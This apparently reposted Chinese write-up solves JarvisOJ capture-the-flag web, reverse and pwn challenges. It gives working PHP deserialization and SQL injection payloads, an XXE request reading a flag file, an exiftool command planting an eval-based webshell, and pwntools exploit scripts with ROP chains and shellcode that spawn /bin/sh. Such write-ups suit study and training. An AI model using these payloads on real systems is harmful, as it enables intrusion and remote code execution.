JarvisOJ Web&Reverse&Pwn
来源:互联网 发布:java list 排序 倒序 编辑:程序博客网 时间:2024/06/06 01:46
- Web
- 0x01 phpinfo
- 0x02 WEB
- 0x03 Easy Gallery
- 0x04 Login
- 0x05 PORT51
- 0x06 LOCALHOST
- 0x07 神盾局的秘密
- 0x08 IN A Mess
- 0x09 api调用
- 0x0a Simple Injection
- 0x0b 图片上传漏洞
- Reverse
- 0x01FindKey
- 0x02 Classical Crackme
- Pwn
- 0x01 XMANlevel0
- 0x02 XMANlevel1
- 0x03 XMANlevel2_x64
Web
0x01 phpinfo()
这是道php序列化漏洞的题目
1.原理
ini_set('session.serialize_handler', 'php_serialize');ini_set('session.serialize_handler', 'php');
两者处理session的方式不同
* php:存储方式是,键名+竖线+经过serialize()函数序列处理的值
name|s:6:"spoock"
- php_serialize(php>5.5.4):存储方式是,经过serialize()函数序列化处理的值
a:1:{s:4:"name";s:6:"spoock";}
2.用法
* 首先访问test1.php
<?phpini_set('session.serialize_handler', 'php_serialize');session_start();$_SESSION["spoock"]=$_GET["a"];?>这一步将设置session的值 |O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}
然后’php_serialize’将会设置session对话并且值为a:1:{s:6:”spoock”;s:48:”|O:5:”lemon”:1:{s:2:”hi”;s:14:”echo “spoock”;”;}”;}
- 然后访问test2.php
<?phpini_set('session.serialize_handler', 'php');session_start();class lemon { var $hi; function __construct(){ $this->hi = 'phpinfo();'; } function __destruct() { eval($this->hi); }}?>
这一步将会利用解析session对话的值,以|为分割符将session分割为键名和值两部分键名:a:1:{s:6:"spoock";s:48:"值O:5:"lemon":1:{s:2:"hi";s:14:"echo "spoock";";}";}从而解析出了序列化,自动生成了lemon的类,当类在结尾销毁时将会调用析构函数执行恶意代码
查看效果
恶意代码成功执行
http://web.jarvisoj.com:32784/
<?php//A webshell is wait for youini_set('session.serialize_handler', 'php');session_start();class OowoO{ public $mdzz; function __construct() { $this->mdzz = 'phpinfo();'; } function __destruct() { eval($this->mdzz); }}if(isset($_GET['phpinfo'])){ $m = new OowoO();}else{ highlight_string(file_get_contents('index.php'));}?>
- 分析要构造session的值为 |O:5:”OowoO”:1:{s:4:”mdzz”;s:7:”echo 1;”;} 形式
<form action="http://web.jarvisoj.com:32784/phpinfo.php" method="POST" enctype="multipart/form-data"> <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /> <input type="file" name="file" /> <input type="submit" /></form>
抓包将filename的值改成payload注意转义字符
最终的提交格式为 |O:5:\"OowoO\":1:{s:4:\"mdzz\";s:27:\"print_r(dirname(__FILE__));\";}
利用print_r(scandir(“/opt/lampp/htdocs”));
payload
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:38:\"print_r(scandir(\"/opt/lampp/htdocs\"));\";}
利用file_get_content获取
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}。
0x02 WEB?
这题首先利用了各种扫描工具,但终究没有结果,在提醒下看了一下源代码
首先利用格式化工具 将代码格式化
之后搜索post字符
问题
1.检测不在后台
2.checkpass.json应该存在
搜索checkpass找到检测代码
function(e) { if (25 !== e.length) return ! 1; for (var t = [], n = 0; n < 25; n++) t.push(e.charCodeAt(n)); for (var r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259], o = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]], n = 0; n < 25; n++) { for (var i = 0, a = 0; a < 25; a++) i += t[a] * o[n][a]; if (i !== r[n]) return ! 1 } return ! 0
逻辑很简单,25元方程组 可以在线解
直接利用python的np模块解题
贴上自己的py代码
import npo = [[11, 13, 32, 234, 236, 3, 72, 237, 122, 230, 157, 53, 7, 225, 193, 76, 142, 166, 11, 196, 194, 187, 152, 132, 135], [76, 55, 38, 70, 98, 244, 201, 125, 182, 123, 47, 86, 67, 19, 145, 12, 138, 149, 83, 178, 255, 122, 238, 187, 221], [218, 233, 17, 56, 151, 28, 150, 196, 79, 11, 150, 128, 52, 228, 189, 107, 219, 87, 90, 221, 45, 201, 14, 106, 230], [30, 50, 76, 94, 172, 61, 229, 109, 216, 12, 181, 231, 174, 236, 159, 128, 245, 52, 43, 11, 207, 145, 241, 196, 80], [134, 145, 36, 255, 13, 239, 212, 135, 85, 194, 200, 50, 170, 78, 51, 10, 232, 132, 60, 122, 117, 74, 117, 250, 45], [142, 221, 121, 56, 56, 120, 113, 143, 77, 190, 195, 133, 236, 111, 144, 65, 172, 74, 160, 1, 143, 242, 96, 70, 107], [229, 79, 167, 88, 165, 38, 108, 27, 75, 240, 116, 178, 165, 206, 156, 193, 86, 57, 148, 187, 161, 55, 134, 24, 249], [235, 175, 235, 169, 73, 125, 114, 6, 142, 162, 228, 157, 160, 66, 28, 167, 63, 41, 182, 55, 189, 56, 102, 31, 158], [37, 190, 169, 116, 172, 66, 9, 229, 188, 63, 138, 111, 245, 133, 22, 87, 25, 26, 106, 82, 211, 252, 57, 66, 98], [199, 48, 58, 221, 162, 57, 111, 70, 227, 126, 43, 143, 225, 85, 224, 141, 232, 141, 5, 233, 69, 70, 204, 155, 141], [212, 83, 219, 55, 132, 5, 153, 11, 0, 89, 134, 201, 255, 101, 22, 98, 215, 139, 0, 78, 165, 0, 126, 48, 119], [194, 156, 10, 212, 237, 112, 17, 158, 225, 227, 152, 121, 56, 10, 238, 74, 76, 66, 80, 31, 73, 10, 180, 45, 94], [110, 231, 82, 180, 109, 209, 239, 163, 30, 160, 60, 190, 97, 256, 141, 199, 3, 30, 235, 73, 225, 244, 141, 123, 208], [220, 248, 136, 245, 123, 82, 120, 65, 68, 136, 151, 173, 104, 107, 172, 148, 54, 218, 42, 233, 57, 115, 5, 50, 196], [190, 34, 140, 52, 160, 34, 201, 48, 214, 33, 219, 183, 224, 237, 157, 245, 1, 134, 13, 99, 212, 230, 243, 236, 40], [144, 246, 73, 161, 134, 112, 146, 212, 121, 43, 41, 174, 146, 78, 235, 202, 200, 90, 254, 216, 113, 25, 114, 232, 123], [158, 85, 116, 97, 145, 21, 105, 2, 256, 69, 21, 152, 155, 88, 11, 232, 146, 238, 170, 123, 135, 150, 161, 249, 236], [251, 96, 103, 188, 188, 8, 33, 39, 237, 63, 230, 128, 166, 130, 141, 112, 254, 234, 113, 250, 1, 89, 0, 135, 119], [192, 206, 73, 92, 174, 130, 164, 95, 21, 153, 82, 254, 20, 133, 56, 7, 163, 48, 7, 206, 51, 204, 136, 180, 196], [106, 63, 252, 202, 153, 6, 193, 146, 88, 118, 78, 58, 214, 168, 68, 128, 68, 35, 245, 144, 102, 20, 194, 207, 66], [154, 98, 219, 2, 13, 65, 131, 185, 27, 162, 214, 63, 238, 248, 38, 129, 170, 180, 181, 96, 165, 78, 121, 55, 214], [193, 94, 107, 45, 83, 56, 2, 41, 58, 169, 120, 58, 105, 178, 58, 217, 18, 93, 212, 74, 18, 217, 219, 89, 212], [164, 228, 5, 133, 175, 164, 37, 176, 94, 232, 82, 0, 47, 212, 107, 111, 97, 153, 119, 85, 147, 256, 130, 248, 235], [221, 178, 50, 49, 39, 215, 200, 188, 105, 101, 172, 133, 28, 88, 83, 32, 45, 13, 215, 204, 141, 226, 118, 233, 156], [236, 142, 87, 152, 97, 134, 54, 239, 49, 220, 233, 216, 13, 143, 145, 112, 217, 194, 114, 221, 150, 51, 136, 31, 198]]r = [325799, 309234, 317320, 327895, 298316, 301249, 330242, 289290, 273446, 337687, 258725, 267444, 373557, 322237, 344478, 362136, 331815, 315157, 299242, 305418, 313569, 269307, 338319, 306491, 351259]o = np.array(o)r = np.array(r)x = np.linalg.solve(o,r)print xstring = ''for i in x: string += chr(int(str(i)[0:-2]))print string
0x03 Easy Gallery
自己也是做了很多上传的题目,也一直想做个总结
这道题很明显是上传的题目
上传题我们一般考虑到几点
1.首先要绕过过滤上传文件
2.执行上传的文件
绕过上传例如
1.%00截断
2.各种花式上传
最重要的就是执行上传的文件要记住以下几点
1.jpg中的php代码可以执行
2.zip等压缩包中的代码可以通过伪协议
3.绕过内容检测
<script language='php'>echo "123";</script>
看看这题
首先考虑各种花式上传目的是要上传PHP文件能够执行恶意代码
发现没有作用,转换思路发现也不能上传zip
那么只能是jpg中嵌入PHP代码了,必须找到文件包含才可以 http://web.jarvisoj.com:32785/index.php?page=view
典型的文件包含注意后面的.php
会自动加上需要截断
那么上传的内容为
直接访问即可
0x04 Login
简单的注入题
看头发现hint "select * from admin where password='".md5($pass,true)."'"
以前的博客有详细的讲解
0x05 PORT51
直接看图
目的是用本机51端口去访问网页,使用vps 51端口访问 curl --local-port 51 http://web.jarvisoj.com:32770/
0x06 LOCALHOST
X-Forwarded-For
字段设置为127.0.0.1即可
0x07 神盾局的秘密
去年做这题时很困难,今年再看时发现如此简单
看下逻辑
看源码发现了 <img src="showimg.php?img=c2hpZWxkLmpwZw==" width="100%"/>
这里有个文件包含,base64解码之后得到shield.jpg
尝试读取index.php
<?php require_once('shield.php'); $x = new Shield(); isset($_GET['class']) && $g = $_GET['class']; if (!empty($g)) { $x = unserialize($g); } echo $x->readfile();?>
利用同样的方法读取shield.php
<?php //flag is in pctf.php class Shield { public $file; function __construct($filename = '') { $this -> file = $filename; } function readfile() { if (!empty($this->file) && stripos($this->file,'..')===FALSE && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) { return @file_get_contents($this->file); } } }?>
最简单的序列化漏洞
直接利用脚本生成序列化的值
<?php //flag is in pctf.php class Shield { public $file; function __construct($filename = '') { $this -> file = $filename; } function readfile() { if (!empty($this->file) && stripos($this->file,'..')===FALSE && stripos($this->file,'/')===FALSE && stripos($this->file,'\\')==FALSE) { return @file_get_contents($this->file); } } }$q = new Shield();$q->file = 'pctf.php';echo serialize($q);?>
输入即可
0x08 IN A Mess
源码泄露index.phps
看思路
首先用AVWS扫描出来了index.phps目录
代码如下
<?phperror_reporting(0);echo "<!--index.phps-->";if(!$_GET['id']){ header('Location: index.php?id=1'); exit();}$id=$_GET['id'];$a=$_GET['a'];$b=$_GET['b'];if(stripos($a,'.')){ echo 'Hahahahahaha'; return ;}$data = @file_get_contents($a,'r');if($data=="1112 is a nice lab!")echo "yes";if($data=="1112 is a nice lab!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4){ require("flag.txt");}else{ print "work harder!harder!harder!";}?>
这样我们得到了源代码就是简单的绕过了
1.$data=="1112 is a nice lab!"
可以利用远程文件包含在allow_url_include
开启时可以使用,但发现对$a
有了.
过滤所以还是data协议比较稳妥,这里有学习链接
最后绕过姿势为a=data:,1112 is a nice lab!
2.$id==0
典型的PHP弱比较可参见我以前的博客
这里可以使id=0e123
或id=asd
任意字符串
3.strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
strlen
函数对%00
不截断但substr
截断那么可以令b=%00412311
显示出来 Come ON!!! {/^HT2mCpcvOLf}
猜测是个目录
打开是个注入
简单过滤了空格,去除敏感字符
利用/*1*/
绕过
字段数为3
显示位为 3
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(seselectlect/*12*/group_concat(table_name)/*12*/frfromom/*12*/information_schema.tables/*12*/where/*12*/table_schema=database())%23
表名为content
id=-1/*12*/uniunionon/*12*/seselectlect/*12*/1,2,(selselectect/*12*/group_concat(column_name)/*12*/frofromm/*12*/information_schema.columns/*12*/where/*12*/table_name=0x636f6e74656e74)%23
找到了context
字段
0x09 api调用
打开发现
Content-Type: application/json
需要读取 flag 猜测是不是 xxe 然后搜到了
http://bobao.360.cn/learning/detail/360.html
Content-Type 头被修改为 application/xml,客户端会告诉服务器 post 过去的数据是 XML 格式的.
加一个 Content-Type: application/xml
payload
POST /api/v1.0/try HTTP/1.1Host: web.jarvisoj.com:9882User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/xmlReferer: http://web.jarvisoj.com:9882/Content-Length: 173Cookie: __cfduid=d5003f0545042bbe0fbc573cda35051f71472823285; UM_distinctid=15abdd622a49f-02e5d4fef34197-7f682331-100200-15abdd622a5cf; role=s%3A5%3A%22guest%22%3B; hsh=3a4727d57463f122833d9e732f94e4e0Connection: close<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:////home/ctf/flag.txt" >]><root><search>name</search><value>&xxe;</value></root>
0x0a Simple Injection
一道非常简答的SQL注入直接用sqlmap跑就可以
0x0b 图片上传漏洞
这是道CVE的题目,真心不会写,看了别人的wp,跟着做了一遍
首先扫到了test.php 但是不知道怎么利用
一开始以为是正常的上传套路但发现各种方式都不行
最后发现phpinfo中的imagick
经典的漏洞
先用 exiftool 生成一个一句话后门 路径由 phpinfo 得到
exiftool -label="\"|/bin/echo \<?php \@eval\(\\$\_POST\[x\]\)\;?\> > /opt/lampp/htdocs/uploads/x.php; \"" 1.png
接着上传该文件
注意filetype参数为show
利用菜刀连接
Reverse
0x01FindKey
用Ubuntu file 指令查看文件格式为pyc
之后直接用uncompyle6 指令(如果没有自行安装 直接pip就行)
直接得到
# uncompyle6 version 2.9.9# Python bytecode 2.7 (62211)# Decompiled from: Python 2.7.12 (default, Nov 19 2016, 06:48:10) # [GCC 5.4.0 20160609]# Embedded file name: findkey# Compiled at: 2016-04-30 17:54:18import syslookup = [ 196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31, 92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178, 182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169, 150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82, 66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231, 212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44, 39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213, 238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186, 0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159, 131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137, 199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154, 185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108, 235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225, 198, 197, 194, 239, 134, 162, 192, 11, 70, 58, 187, 50, 67, 236, 230, 13, 99, 190, 208, 207, 7, 53, 219, 203, 62, 114, 127, 125, 164, 179, 175, 112, 172, 250, 133, 130, 52, 189, 97, 146, 34, 157, 120, 195, 45, 4, 142, 139]pwda = [ 188, 155, 11, 58, 251, 208, 204, 202, 150, 120, 206, 237, 114, 92, 126, 6, 42]pwdb = [53, 222, 230, 35, 67, 248, 226, 216, 17, 209, 32, 2, 181, 200, 171, 60, 108]flag = raw_input('Input your Key:').strip()if len(flag) != 17: print 'Wrong Key!!' sys.exit(1)flag = flag[::-1]for i in range(0, len(flag)): if ord(flag[i]) + pwda[i] & 255 != lookup[i + pwdb[i]]: print 'Wrong Key!!' sys.exit(1)print 'Congratulations!!'# okay decompiling 1.pyc
直接写解密程序就好了
# uncompyle6 version 2.9.9# Python bytecode 2.7 (62211)# Decompiled from: Python 2.7.12 (default, Nov 19 2016, 06:48:10) # [GCC 5.4.0 20160609]# Embedded file name: findkey# Compiled at: 2016-04-30 17:54:18import syslookup = [ 196, 153, 149, 206, 17, 221, 10, 217, 167, 18, 36, 135, 103, 61, 111, 31, 92, 152, 21, 228, 105, 191, 173, 41, 2, 245, 23, 144, 1, 246, 89, 178, 182, 119, 38, 85, 48, 226, 165, 241, 166, 214, 71, 90, 151, 3, 109, 169, 150, 224, 69, 156, 158, 57, 181, 29, 200, 37, 51, 252, 227, 93, 65, 82, 66, 80, 170, 77, 49, 177, 81, 94, 202, 107, 25, 73, 148, 98, 129, 231, 212, 14, 84, 121, 174, 171, 64, 180, 233, 74, 140, 242, 75, 104, 253, 44, 39, 87, 86, 27, 68, 22, 55, 76, 35, 248, 96, 5, 56, 20, 161, 213, 238, 220, 72, 100, 247, 8, 63, 249, 145, 243, 155, 222, 122, 32, 43, 186, 0, 102, 216, 126, 15, 42, 115, 138, 240, 147, 229, 204, 117, 223, 141, 159, 131, 232, 124, 254, 60, 116, 46, 113, 79, 16, 128, 6, 251, 40, 205, 137, 199, 83, 54, 188, 19, 184, 201, 110, 255, 26, 91, 211, 132, 160, 168, 154, 185, 183, 244, 78, 33, 123, 28, 59, 12, 210, 218, 47, 163, 215, 209, 108, 235, 237, 118, 101, 24, 234, 106, 143, 88, 9, 136, 95, 30, 193, 176, 225, 198, 197, 194, 239, 134, 162, 192, 11, 70, 58, 187, 50, 67, 236, 230, 13, 99, 190, 208, 207, 7, 53, 219, 203, 62, 114, 127, 125, 164, 179, 175, 112, 172, 250, 133, 130, 52, 189, 97, 146, 34, 157, 120, 195, 45, 4, 142, 139]pwda = [ 188, 155, 11, 58, 251, 208, 204, 202, 150, 120, 206, 237, 114, 92, 126, 6, 42]pwdb = [53, 222, 230, 35, 67, 248, 226, 216, 17, 209, 32, 2, 181, 200, 171, 60, 108]flag = ''for i in range(0, 17): flag += chr(lookup[i + pwdb[i]]-pwda[i] & 255)flag = flag[::-1]print flag# okay decompiling 1.pyc
PCTF{PyC_Cr4ck3r}
0x02 Classical Crackme
直接IDA32静态反汇编
看到有一处base64
解码后得到flag 这也太简单了
PCTF{Ea5y_Do_Net_Cr4ck3r}
Pwn
入了pwn坑,感觉要学习好多东西先从这里开始吧
0x01 [XMAN]level0
首先利用IDA进行静态分析,利用checksec进行检查发现堆栈不可执行
ssize_t vulnerable_function(){ char buf; // [sp+0h] [bp-80h]@1 return read(0, &buf, 0x200uLL);}
很明显的栈溢出函数read
同时也找到了system
函数以及/bin/sh
字符串
但是发现了无法传参至system
函数,因为在此程序里利用的是寄存器传参并不是堆栈传参。
利用ropper 找到pop edi;ret 地址
直接构造exploit
from pwn import *level0 = ELF('./level0')systemplt = level0.plt['system']print hex(systemplt)system = 0x400460#0x0000000000400663 pop edi retsh = remote('pwn2.jarvisoj.com', 9881)padding = "A"*0x88addr = p64(0x400663)argv = p64(0x400684)# /bin/shshellcode = padding + addr + argv +p64(system)sh.send(shellcode)sh.interactive()
另寻他路
找到了callsystem
函数
直接利用就好了
from pwn import *sh = remote('pwn2.jarvisoj.com', 9881)padding = "A"*0x88addr = p64(0x400596)shellcode = padding + addrsh.send(shellcode)sh.interactive()
from zio import *sh = zio(('pwn2.jarvisoj.com', 9881))#这里注意括号padding = "A"*0x88addr = l64(0x400596)shellcode = padding + addrsh.write(shellcode)sh.interact()
0x02 [XMAN]level1
还是首先看IDA反汇编的代码
ssize_t vulnerable_function(){ char buf; // [sp+0h] [bp-88h]@1 printf("What's this:%p?\n", &buf); return read(0, &buf, 0x100u);}
存在明显的栈溢出,因为没有libc文件,没有system函数地址无法直接使用,需要自己写shellcode但是自己的shellcode写在哪里?发现程序讲buf数组的第一个地址打印了出来,可以在这里进行shellcode的编写。
from zio import *sh = zio(('pwn2.jarvisoj.com', 9877))s = sh.readline()padding = 0x88+4shellcode = "\x31\xc0\x31\xdb\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\x51\x52\x55\x89\xe5\x0f\x34\x31\xc0\x31\xdb\xfe\xc0\x51\x52\x55\x89\xe5\x0f\x34"addr = l32(int(s[len("What's this:"):-2],16))ex = shellcode + 'A'*(padding-len(shellcode))+addrsh.write(ex)sh.interact()
0x03 [XMAN]level2_x64
本题目与level0类似
IDA查看
.text:00000000004005F6 push rbp.text:00000000004005F7 mov rbp, rsp.text:00000000004005FA add rsp, 0FFFFFFFFFFFFFF80h.text:00000000004005FE mov edi, offset command ; "echo Input:".text:0000000000400603 call _system.text:0000000000400608 lea rax, [rbp+buf].text:000000000040060C mov edx, 200h ; nbytes.text:0000000000400611 mov rsi, rax ; buf.text:0000000000400614 mov edi, 0 ; fd.text:0000000000400619 call _read.text:000000000040061E leave.text:000000000040061F retn.text:000000000040061F vulnerable_function endp
典型的栈溢出漏洞
同样找到了system和/bin/sh的地址
from pwn import *level0 = ELF('./level2_x64')systemplt = level0.plt['system']print hex(systemplt)system = 0x4004c0#0x00000000004006b3: pop rdi; ret; sh = remote('pwn2.jarvisoj.com', 9882)padding = "A"*0x88addr = p64(0x4006b3)argv = p64(0x600a90)# /bin/shshellcode = padding + addr + argv +p64(system)sh.send(shellcode)sh.interactive()
- JarvisOJ Web&Reverse&Pwn
- jarvisoj WEB +MISC writeup
- jarvisoj-web-wp
- jarvisoj pwn level1 ——记第一次shellcode的编写
- 广西首届网络安全选拔赛PWN、REVERSE、决赛题目
- Using a hacked Wordpress site to pwn the web server
- ISCC2014--pwn
- Pwn笔记
- Day16:PWN
- pwn --rop
- iscc2017 pwn
- JarvisOJ misc100-easyapk wp
- JarvisOJ basic部分WriteUp
- Jarvisoj 逆向总结
- JarvisOJ-You-Need-Python-wp
- 171130 逆向-JarvisOJ(Fibonacci)
- 171223 逆向-JarvisOJ(EvilExe)
- Ubuntu 16.04 for pwn
- 读取jar包MANIFEST.MF文件
- 基于手工接口测试的工具
- shell语法-变量
- HTML/CSS学习汇总(4)
- java从基础知识(一)数据类型(下)
- JarvisOJ Web&Reverse&Pwn
- 保留位置
- Java中间变量缓存机制
- 问题 L: DS_6.12 最近共同祖先(by Yan)
- org.hibernate.MappingException: entity class not found
- RCNN & SPP-net & Fast-RCNN & Faster-RCNN
- hbase启动后HMaster自动关闭
- SWT Jface
- 【BZOJ 1087】【SCOI 2005】互不侵犯King 【状压DP】